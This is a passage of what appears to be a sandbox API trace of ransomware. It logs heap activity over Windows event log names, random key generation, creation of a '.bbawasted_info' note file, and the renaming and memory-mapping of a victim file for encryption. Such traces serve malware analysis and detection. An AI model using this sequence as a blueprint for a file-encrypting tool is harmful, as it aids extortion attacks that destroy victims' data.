(HeapHandle=0x660000, Flags=0x0, Size=0xc8) returned 0x6a96a0 [0158.894] lstrlenW (lpString="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 49 [0158.895] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xcc) returned 0x6a7408 [0158.895] lstrlenW (lpString="Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 48 [0158.895] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xca) returned 0x6a8260 [0158.895] lstrlenW (lpString="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 56 [0158.895] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xda) returned 0x6a9770 [0158.895] lstrlenW (lpString="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 53 [0158.895] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd4) returned 0x6a9858 [0158.895] lstrlenW (lpString="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 51 [0158.895] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd0) returned 0x6a8338 [0158.896] lstrlenW (lpString="Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 42 [0158.896] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x6a9938 [0158.896] lstrlenW (lpString="Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 47 [0158.896] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc8) returned 0x6a9a00 [0158.896] lstrlenW (lpString="Microsoft-Windows-Known Folders API Service.evtx") returned 48 [0158.896] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xca) returned 0x6a7c78 [0158.896] lstrlenW (lpString="Microsoft-Windows-LiveId%4Operational.evtx") returned 42 [0158.896] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x6a9ad0 [0158.896] lstrlenW (lpString="Microsoft-Windows-MUI%4Admin.evtx") returned 33 [0158.896] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xac) returned 0x6a9b98 [0158.896] lstrlenW (lpString="Microsoft-Windows-MUI%4Operational.evtx") returned 39 [0158.896] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb8) returned 0x6a1fb8 [0158.897] lstrlenW (lpString="Microsoft-Windows-NCSI%4Operational.evtx") returned 40 [0158.897] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xba) returned 0x6a9c50 [0158.897] lstrlenW (lpString="Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 50 [0158.897] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xce) returned 0x6a7ac8 [0158.897] lstrlenW (lpString="Microsoft-Windows-Ntfs%4Operational.evtx") returned 40 [0158.897] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xba) returned 0x6a9d18 [0158.897] lstrlenW (lpString="Microsoft-Windows-Ntfs%4WHC.evtx") returned 32 [0158.897] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xaa) returned 0x6a9de0 [0158.897] lstrlenW (lpString="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 74 [0158.897] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xfe) returned 0x6a9e98 [0158.897] lstrlenW (lpString="Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 46 [0158.897] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc6) returned 0x69ee70 [0158.897] lstrlenW (lpString="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 64 [0158.897] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xea) returned 0x69ef40 [0158.898] lstrlenW (lpString="Microsoft-Windows-SettingSync%4Debug.evtx") returned 41 [0158.898] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbc) returned 0x69f038 [0158.898] lstrlenW (lpString="Microsoft-Windows-SettingSync%4Operational.evtx") returned 47 [0158.898] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc8) returned 0x69f100 [0158.898] lstrlenW (lpString="Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 47 [0158.898] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc8) returned 0x69f1d0 [0158.898] lstrlenW (lpString="Microsoft-Windows-Shell-Core%4Operational.evtx") returned 46 [0158.898] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc6) returned 0x69f2a0 [0158.898] lstrlenW (lpString="Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 46 [0158.898] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc6) returned 0x69f370 [0158.898] lstrlenW (lpString="Microsoft-Windows-SMBClient%4Operational.evtx") returned 45 [0158.898] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc4) returned 0x69f440 [0158.899] lstrlenW (lpString="Microsoft-Windows-SmbClient%4Security.evtx") returned 42 [0158.899] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x69f510 [0158.899] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Audit.evtx") returned 39 [0158.899] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb8) returned 0x6a1538 [0158.899] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 46 [0158.899] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc6) returned 0x69f5d8 [0158.899] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Operational.evtx") returned 45 [0158.899] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc4) returned 0x6aaa58 [0158.900] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Security.evtx") returned 42 [0158.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x69f6a8 [0158.900] lstrlenW (lpString="Microsoft-Windows-Store%4Operational.evtx") returned 41 [0158.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbc) returned 0x69f770 [0158.900] lstrlenW (lpString="Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 49 [0158.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xcc) returned 0x6a7d50 [0158.900] lstrlenW (lpString="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 66 [0158.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x69f838 [0158.901] lstrlenW (lpString="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 72 [0158.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xfa) returned 0x69f930 [0158.901] lstrlenW (lpString="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 70 [0158.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf6) returned 0x69fa38 [0158.901] lstrlenW (lpString="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 76 [0158.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x102) returned 0x69fb38 [0158.901] lstrlenW (lpString="Microsoft-Windows-TWinUI%4Operational.evtx") returned 42 [0158.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x69fc48 [0158.901] lstrlenW (lpString="Microsoft-Windows-User Profile Service%4Operational.evtx") returned 56 [0158.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xda) returned 0x69fd10 [0158.901] lstrlenW (lpString="Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 44 [0158.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2) returned 0x6aa4a8 [0158.902] lstrlenW (lpString="Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 45 [0158.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc4) returned 0x6aa988 [0158.902] lstrlenW (lpString="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 57 [0158.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xdc) returned 0x69fdf8 [0158.902] lstrlenW (lpString="Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 42 [0158.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x69fee0 [0158.902] lstrlenW (lpString="Microsoft-Windows-Windows Defender%4Operational.evtx") returned 52 [0158.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd2) returned 0x69ffa8 [0158.902] lstrlenW (lpString="Microsoft-Windows-Windows Defender%4WHC.evtx") returned 44 [0158.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2) returned 0x6aab28 [0158.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x6a0088 [0158.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xfa) returned 0x6a01a0 [0158.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xdc) returned 0x6a02a8 [0158.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2) returned 0x6aa168 [0158.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xca) returned 0x6a7918 [0158.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x84) returned 0x6a0390 [0158.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7e) returned 0x6a08a0 [0158.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6a0420 [0158.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x98) returned 0x6a04a8 [0158.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d798 | out: hHeap=0x660000) returned 1 [0158.909] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d798 | out: hHeap=0x660000) returned 1 [0158.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac208 | out: hHeap=0x660000) returned 1 [0158.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac208 | out: hHeap=0x660000) returned 1 [0158.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac208 | out: hHeap=0x660000) returned 1 [0158.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad468 | out: hHeap=0x660000) returned 1 [0158.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad468 | out: hHeap=0x660000) returned 1 [0158.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad468 | out: hHeap=0x660000) returned 1 [0158.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac208 | out: hHeap=0x660000) returned 1 [0158.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac208 | out: hHeap=0x660000) returned 1 [0158.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac208 | out: hHeap=0x660000) returned 1 [0158.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac208 | out: hHeap=0x660000) returned 1 [0158.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac208 | out: hHeap=0x660000) returned 1 [0158.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac208 | out: hHeap=0x660000) returned 1 [0158.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac208 | out: hHeap=0x660000) returned 1 [0158.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac208 | out: hHeap=0x660000) returned 1 [0158.997] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0158.997] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0158.997] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0158.997] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0158.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0158.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0158.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0158.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0158.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aafa8 | out: hHeap=0x660000) returned 1 [0158.998] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aafa8 | out: hHeap=0x660000) returned 1 [0159.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb58 | out: hHeap=0x660000) returned 1 [0159.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb58 | out: hHeap=0x660000) returned 1 [0159.007] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb58 | out: hHeap=0x660000) returned 1 [0159.007] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0159.007] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aafa8 | out: hHeap=0x660000) returned 1 [0159.008] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0159.008] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0159.008] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0159.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6add90 | out: hHeap=0x660000) returned 1 [0159.011] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0159.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6add90 | out: hHeap=0x660000) returned 1 [0159.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6add90 | out: hHeap=0x660000) returned 1 [0159.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6add90 | out: hHeap=0x660000) returned 1 [0159.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6add90 | out: hHeap=0x660000) returned 1 [0159.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6add90 | out: hHeap=0x660000) returned 1 [0159.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6add90 | out: hHeap=0x660000) returned 1 [0159.017] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0159.017] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0159.018] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6add90 | out: hHeap=0x660000) returned 1 [0159.018] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0159.018] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0159.019] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0159.022] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bee50 | out: hHeap=0x660000) returned 1 [0159.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bee50 | out: hHeap=0x660000) returned 1 [0159.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bca90 | out: hHeap=0x660000) returned 1 [0159.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0159.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ba258 | out: hHeap=0x660000) returned 1 [0159.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8ef0 | out: hHeap=0x660000) returned 1 [0159.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6add90 | out: hHeap=0x660000) returned 1 [0159.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0159.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdef8 | out: hHeap=0x660000) returned 1 [0159.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdef8 | out: hHeap=0x660000) returned 1 [0159.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0159.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0159.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0159.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.072] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b9ef8 | out: hHeap=0x660000) returned 1 [0159.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6198 | out: hHeap=0x660000) returned 1 [0159.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be560 | out: hHeap=0x660000) returned 1 [0159.074] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be560 | out: hHeap=0x660000) returned 1 [0159.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be560 | out: hHeap=0x660000) returned 1 [0159.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.075] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aafa8 | out: hHeap=0x660000) returned 1 [0159.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.079] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.080] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.080] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.082] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.082] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.082] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.083] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.083] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.083] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d798 | out: hHeap=0x660000) returned 1 [0159.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6abfb0 | out: hHeap=0x660000) returned 1 [0159.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6abfb0 | out: hHeap=0x660000) returned 1 [0159.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d798 | out: hHeap=0x660000) returned 1 [0159.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69c538 | out: hHeap=0x660000) returned 1 [0159.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x68a268 | out: hHeap=0x660000) returned 1 [0159.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x68c530 | out: hHeap=0x660000) returned 1 [0159.172] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66d3a8) returned 1 [0159.173] CryptGenRandom (in: hProv=0x66d3a8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0159.173] CryptReleaseContext (hProv=0x66d3a8, dwFlags=0x0) returned 1 [0159.173] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 48 [0159.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6aecf0 [0159.173] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0159.173] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef68) returned 1 [0159.174] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0159.174] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.174] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0159.175] WriteFile (in: hFile=0x27c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.289] SetEndOfFile (hFile=0x27c) returned 1 [0159.290] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0159.290] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.bbawasted")) returned 1 [0159.291] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0159.291] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0159.291] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x121e6 [0159.291] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x121e6) returned 0x630000 [0159.291] CloseHandle (hObject=0x280) returned 1 [0159.304] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0159.305] CloseHandle (hObject=0x28c) returned 1 [0159.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0159.305] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef68) returned 1 [0159.306] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0159.306] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.306] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef68) returned 1 [0159.307] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0159.307] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0159.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.435] _snwprintf (in: _Dest=0x6b5190, 